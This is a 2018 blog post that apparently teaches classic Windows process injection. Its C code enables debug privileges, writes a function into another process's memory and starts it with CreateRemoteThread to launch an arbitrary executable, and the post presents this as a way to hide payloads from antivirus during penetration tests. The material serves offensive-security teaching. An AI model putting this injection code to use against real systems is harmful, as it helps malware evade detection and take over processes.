<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="Francesco Pompo'">

<title>francesco.cc</title>

<!-- Bootstrap Core CSS -->
<link href="/css/bootstrap.min.css" rel="stylesheet">

<!-- Custom CSS -->
<link href="/css/grayscale.css" rel="stylesheet">

<link href="/css/custom.css" rel="stylesheet">

<!-- Custom Fonts -->
<link href="/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="/css/code.css" rel="stylesheet" type="text/css">

<link href='https://fonts.googleapis.com/css?family=Open Sans' rel='stylesheet'>
<link href='https://fonts.googleapis.com/css?family=Source Code Pro' rel='stylesheet'>

<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->

</head>

<body id="page-top" data-spy="scroll" data-target=".navbar-fixed-top">

    <!-- Navigation -->
<nav class="navbar navbar-custom navbar-fixed-top" role="navigation">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-main-collapse">
                <i class="fa fa-bars"></i>
            </button>
            <a class="navbar-brand page-scroll" href="#page-top">
                <i class="fa fa-code"></i> francesco.cc
            </a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <div class="collapse navbar-collapse navbar-right navbar-main-collapse">
            <ul class="nav navbar-nav">
                <!-- Hidden li included to remove active class from about link when scrolled up past about section -->
                
                    <li>
                        <a href="/">Home</a>
                    </li>
                
                    <li>
                        <a href="/#about">About</a>
                    </li>
                
                    <li>
                        <a href="/contacts">Contacts</a>
                    </li>
                
                    <li>
                        <a href="/archives">Archive</a>
                    </li>
                
                <li class="hidden">
                    <a href="#page-top"></a>
                </li>

                
                
            </ul>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>


    
<!-- Intro Header -->
<header class="intro">
    <div class="intro-body">
        <div class="background-image" style="background-image: url('/images/injection.jpg')"></div>
        <div class="container">
            <div class="row">
                <div class="col-md-12 ">
                    <h1 class="brand-heading">Code Injection on Windows</h1>
                    
                        <div class="post-intro">
                            <p><i class="fa fa-calendar fa-fw"></i> 27 May 2018</p>

                            <p> <i class="fa fa-info fa-fw"></i> 1,391 Words / Reading time: 9 mins </p>
                            <p>
                                
                                    #Windows
                                
                                    #hacking
                                
                            </p>
                        </div>
                    


                    
                </div>
            </div>
        </div>
    </div>
</header>


    <section id="content" class="container content-section markdown-body">
            <h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>The purpose of this document is to describe one of the most basic code injection techniques by using some of the APIs provided by the Windows operating system for process interaction.</p>
<p>Code injection can be used in case it is necessary to make the detection of a payload <strong>more difficult</strong> within a compromised system, because it should not be sought inside a single process.<br><a id="more"></a><br>It is possible to find an example of a more sophisticated use of the above technique into the “migrate” (ReflectiveLoader) feature of <strong>meterpreter</strong>, which completely moves the execution of the agent into a<br>process chosen by the attacker.</p>
<p>Used in symbiosis with some evasion mechanics, the method works well even in presence of anti-virus solutions with <strong>sandboxing</strong> components.<br>Instead, in presence of solutions with <strong>hooking</strong> components, it could not achieve the same results as some particular API call chains can be captured and compared with some signatures.</p>
<h2 id="Requirements"><a href="#Requirements" class="headerlink" title="Requirements"></a>Requirements</h2><p>In order to success it is important to have the correct permissions for <strong>writing</strong> and <strong>executing</strong> code<br>into another process’s memory. It is also needed to disable any kind of optimization during the<br>compiling and linking phases of the project.</p>
<h2 id="Overview"><a href="#Overview" class="headerlink" title="Overview"></a>Overview</h2><p>The implementation described in the document is the following list of operations:</p>
<ul>
<li>To enable debug privileges through the use of <strong>OpenProcessToken</strong>, <strong>LookupPrivileges</strong> and<br><strong>AdjustTokenPrivileges</strong> APIs.</li>
<li>To obtain a handle of the process through the use of <strong>OpenProcess</strong> API.</li>
<li>To allocate the appropriate memory areas (for data and code) through the use of the<br><strong>VirtualAllocEx</strong> API.</li>
<li>To write the data and the code through the use of the <strong>WriteProcessMemory</strong> API.</li>
<li>To proceed to the creation of a new thread on the process through the use of the<br><strong>CreateRemoteThread</strong> API.</li>
</ul>
<h2 id="Procedure"><a href="#Procedure" class="headerlink" title="Procedure"></a>Procedure</h2><p>In this section of the document will be explained the most important parts of the attached example<br>source code.</p>
<h3 id="Functions-and-structures"><a href="#Functions-and-structures" class="headerlink" title="Functions and structures"></a>Functions and structures</h3><p>The core of the project are a function and a data structure which will be both injected into the<br>remote process.<br>The data structure will be passed as parameter to the function.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">typedef</span> <span class="title">BOOL</span> <span class="params">(WINAPI *_CreateProcess)</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_opt_    LPCTSTR               lpApplicationName,</span></span></span><br><span class="line"><span class="function"><span class="params">    _Inout_opt_ LPTSTR                lpCommandLine,</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_opt_    LPSECURITY_ATTRIBUTES lpProcessAttributes,</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_opt_    LPSECURITY_ATTRIBUTES lpThreadAttributes,</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_        BOOL                  bInheritHandles,</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_        DWORD                 dwCreationFlags,</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_opt_    LPVOID                lpEnvironment,</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_opt_    LPCTSTR               lpCurrentDirectory,</span></span></span><br><span class="line"><span class="function"><span class="params">    _In_        LPSTARTUPINFO         lpStartupInfo,</span></span></span><br><span class="line"><span class="function"><span class="params">    _Out_       LPPROCESS_INFORMATION lpProcessInformation</span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span>;</span><br></pre></td></tr></table></figure>
<p>This is the definition of a type of function which is identical to the <strong>CreateProcess</strong> API. This<br>definition will be useful to declare functions that can accept the same type and number of<br>parameters and that can return the same type of value.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">	_CreateProcess __CreateProcess;</span><br><span class="line">	WCHAR path[MAX_PATH];</span><br><span class="line">&#125; InjectData;</span><br></pre></td></tr></table></figure>
<p>This is a type of data structure named InjectData. It contains a _CreateProcess type of function<br>and a path which will be used to find the executable to be started.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">DWORD __<span class="function">stdcall <span class="title">injectFn</span><span class="params">(PVOID param)</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* stack allocation is ok */</span></span><br><span class="line">	InjectData *injData;</span><br><span class="line">	STARTUPINFOW si;</span><br><span class="line">	PROCESS_INFORMATION pi;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	injData = (InjectData*)param;</span><br><span class="line"></span><br><span class="line">	MEMSET_MACRO(&amp;si, <span class="number">0</span>, <span class="keyword">sizeof</span>(si));</span><br><span class="line">	MEMSET_MACRO(&amp;pi, <span class="number">0</span>, <span class="keyword">sizeof</span>(pi));</span><br><span class="line"></span><br><span class="line">	si.cb = <span class="keyword">sizeof</span>(si);</span><br><span class="line">	<span class="comment">/* CreateProcess address should be the same on every process as kernel32.dll will be 99.99% of times loaded at the same address */</span></span><br><span class="line">	injData-&gt;__CreateProcess(injData-&gt;path, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, FALSE, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, &amp;si, &amp;pi);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="function">VOID <span class="title">injectFnEnd</span><span class="params">()</span> </span>&#123;&#125;</span><br></pre></td></tr></table></figure>
<p>This is the function that will be injected into the remote process. It accepts an <strong>InjectData</strong> structure<br>as a parameter and uses the <strong>injData-&gt;__CreateProcess</strong> pointer by passing <strong>injData-&gt;path</strong> as a<br>parameter to it in order to start the specified executable.<br>In summary, this function makes possible the start of an arbitrary executable from a remote<br>process.</p>
<h3 id="Enabling-of-debug-privileges"><a href="#Enabling-of-debug-privileges" class="headerlink" title="Enabling of debug privileges"></a>Enabling of debug privileges</h3><p>It is important to enable the debug privileges on the injector’s process, because in some cases it<br>may not be possible to obtain a handle to the remote process without them.<br>The following is a generic function to solve the problem.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">getDebugPriv</span><span class="params">()</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">	HANDLE hToken;</span><br><span class="line">	TOKEN_PRIVILEGES tokenPriv;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &amp;hToken))</span><br><span class="line">	&#123;</span><br><span class="line">		LookupPrivilegeValue(<span class="literal">NULL</span>, SE_DEBUG_NAME, &amp;tokenPriv.Privileges[<span class="number">0</span>].Luid);</span><br><span class="line">		tokenPriv.PrivilegeCount = <span class="number">1</span>;</span><br><span class="line">		tokenPriv.Privileges[<span class="number">0</span>].Attributes = SE_PRIVILEGE_ENABLED;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> (!AdjustTokenPrivileges(hToken, <span class="number">0</span>, &amp;tokenPriv, <span class="keyword">sizeof</span>(tokenPriv), <span class="literal">NULL</span>, <span class="literal">NULL</span>))</span><br><span class="line">			<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">			<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>The function makes use of the <strong>OpenProcessToken</strong>, <strong>LookupPrivilegeValue</strong> and<br><strong>AdjustTokenPrivilege</strong> APIs to modify the privileges of its process.</p>
<h3 id="Obtaining-process’s-handle"><a href="#Obtaining-process’s-handle" class="headerlink" title="Obtaining process’s handle"></a>Obtaining process’s handle</h3><p>The next step is to obtain the PID of the process in which it is interested to operate, the example<br>code refers to the APIs declared inside the “<strong>tlhelp32.h</strong>” header, but it is not the only way to face<br>the problem.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">DWORD <span class="title">getPidByName</span><span class="params">(WCHAR *procname)</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">	PROCESSENTRY32 entry;</span><br><span class="line">	HANDLE hSnap;</span><br><span class="line"></span><br><span class="line">	entry.dwSize = <span class="keyword">sizeof</span>(PROCESSENTRY32);</span><br><span class="line">	hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (Process32First(hSnap, &amp;entry) == TRUE) &#123;</span><br><span class="line">		<span class="keyword">while</span> (Process32Next(hSnap, &amp;entry) == TRUE)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="keyword">if</span> (wcsicmp(entry.szExeFile, procname) == <span class="number">0</span>)</span><br><span class="line">				<span class="keyword">return</span> entry.th32ProcessID;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>In summary the function creates a <strong>snapshot</strong> of the processes’ list in a precise instant and<br>subsequently they are compared one by one with the name of the sought process (procname).<br>When a match is found, the PID is returned, otherwise zero is the return value.</p>
<p>Once the PID is obtained you just need a call to the <strong>OpenProcess</strong> API by using the correct<br>parameters.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Getting debug privileges before starting our sneaky things */</span></span><br><span class="line"><span class="keyword">if</span> (getDebugPriv() != <span class="number">0</span>)</span><br><span class="line">	<span class="keyword">goto</span> cleanup;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Getting PID of the process name specified in the cmdline */</span></span><br><span class="line">pid = getPidByName(argv[<span class="number">1</span>]);</span><br><span class="line"><span class="keyword">if</span> (!pid)</span><br><span class="line">	<span class="keyword">goto</span> cleanup;</span><br></pre></td></tr></table></figure>
<p>In this example the specified access rights are <strong>PROCESS_ALL_ACCESS</strong> for keeping it simple,<br>but <strong>PROCESS_CREATE_THREAD</strong>, <strong>PROCESS_VM_OPERATION</strong> and <strong>PROCESS_VM_WRITE</strong><br>should be enough for the task.</p>
<h3 id="Allocating-and-writing-of-data-and-code"><a href="#Allocating-and-writing-of-data-and-code" class="headerlink" title="Allocating and writing of data and code"></a>Allocating and writing of data and code</h3><p>The second-last step is to allocate the memory needed for data and code and to write them.<br>This is made possible by an appropriate use of the <strong>VirtualAllocEx</strong> and <strong>WriteProcessMemory</strong><br>APIs.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Allocating the right amount of space in the remote process */</span></span><br><span class="line">pData = VirtualAllocEx(hProcess, <span class="number">0</span>, <span class="keyword">sizeof</span>(injData), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);</span><br><span class="line"><span class="keyword">if</span> (!pData)</span><br><span class="line">    <span class="keyword">goto</span> cleanup;</span><br><span class="line"></span><br><span class="line">pFn = VirtualAllocEx(hProcess, <span class="number">0</span>, sizeOfInjFn, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);</span><br><span class="line"><span class="keyword">if</span> (!pFn)</span><br><span class="line">    <span class="keyword">goto</span> cleanup;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Writing injData structure and injectFn function into the remote process space */</span></span><br><span class="line"><span class="keyword">if</span> (!WriteProcessMemory(hProcess, pData, &amp;injData, <span class="keyword">sizeof</span>(injData), <span class="number">0</span>))</span><br><span class="line">    <span class="keyword">goto</span> cleanup;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!WriteProcessMemory(hProcess, pFn, injectFn, sizeOfInjFn, <span class="number">0</span>))</span><br><span class="line">    <span class="keyword">goto</span> cleanup;</span><br></pre></td></tr></table></figure>
<p>During the first call to VirtualAllocEx it is asked an allocation of memory equal to the dimension of<br>the <strong>injData</strong> structure and respectively, during the second call, equal to the dimension of the<br><strong>injectFn</strong> function.<br>The injectFn dimension is calculated simply by placing a dummy function, the <strong>injectFnEnd</strong>, after it<br>and by doing a subtraction of their pointers.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* to be changed to DWORD64 on 64bit systems */</span></span><br><span class="line">sizeOfInjFn = (DWORD)injectFnEnd - (DWORD)injectFn;</span><br></pre></td></tr></table></figure>
<p>This way, by disabling all the optimizations of the linker, it becomes possible to calculate the exact<br>dimension of the injectFn function.</p>
<p>The two calls to the <strong>WriteProcessMemory</strong> API are needed to write the data contained in<br>(&amp;)injData and injectFn respectively to the <strong>pData</strong> and <strong>pFn</strong> pointers, but into the remote process<br>space.</p>
<h3 id="Creation-of-the-remote-thread"><a href="#Creation-of-the-remote-thread" class="headerlink" title="Creation of the remote thread"></a>Creation of the remote thread</h3><p>At the end, making sure that the shellcode doesn’t make any reference to memory areas that are<br>not accessible from another process (strings, functions, etc.), it is possible to invoke the<br><strong>CreateRemoteThread</strong> API by specifying the pFn pointer as the function and the pData pointer as<br>the parameter.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Starting a new thread in the remote process at the pFn pointer and passing pData pointer to it */</span></span><br><span class="line"><span class="keyword">if</span> (CreateRemoteThread(hProcess, <span class="number">0</span>, <span class="number">0</span>, (LPTHREAD_START_ROUTINE)pFn, pData, <span class="number">0</span>, &amp;tid) == <span class="literal">NULL</span>)</span><br><span class="line">    <span class="keyword">goto</span> cleanup;</span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Success! TID: %u\n"</span>, tid);</span><br></pre></td></tr></table></figure>
<h2 id="Conclusions"><a href="#Conclusions" class="headerlink" title="Conclusions"></a>Conclusions</h2><p>Even if basic, this technique it is not obsolete, because it can happen often to not being able to use<br>conventional payloads during some penetration test phases, and making other processes doing<br>sensitive operations can make a difference.</p>
<h2 id="Contributions"><a href="#Contributions" class="headerlink" title="Contributions"></a>Contributions</h2><p>Thanks to Paolo Campo for a more clear syntax in the Italian version of this document.</p>
<h2 id="Example-code"><a href="#Example-code" class="headerlink" title="Example code"></a>Example code</h2><p>You can find the example source code in the following repository:<br><a href="https://github.com/pfrankw/code_injection_example" target="_blank" rel="noopener">https://github.com/pfrankw/code_injection_example</a></p>

</section>


    <!-- Footer -->
<footer>
    <div class="container text-center">
        <ul class="list-inline banner-social-buttons">
            <li>
                <a href="https://twitter.com/pfrankw" class="btn btn-default"><i class="fa fa-twitter fa-fw"></i> <span class="network-name"></span></a>
            </li>
            <li>
                <a href="https://github.com/pfrankw" class="btn btn-default"><i class="fa fa-github fa-fw"></i> <span class="network-name"></span></a>
            </li>
            <li>
                <a href="https://it.linkedin.com/in/francescopompo" class="btn btn-default"><i class="fa fa-linkedin fa-fw"></i> <span class="network-name"></span></a>
            </li>
        </ul>
        <p>Copyright &copy; 2018 Francesco Pompo&#39;. All rights reserved.</p>
    </div>
</footer>

<!-- jQuery -->
<script src="/js/jquery.js"></script>

<!-- Bootstrap Core JavaScript -->
<script src="/js/bootstrap.min.js"></script>

<!-- Plugin JavaScript -->
<script src="/js/jquery.easing.min.js"></script>


<!-- Custom Theme JavaScript -->
<script src="/js/grayscale.js"></script>


    <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

      ga('create', 'UA-51324760-2', 'auto');
      ga('send', 'pageview');

    </script>



</body>

</html>
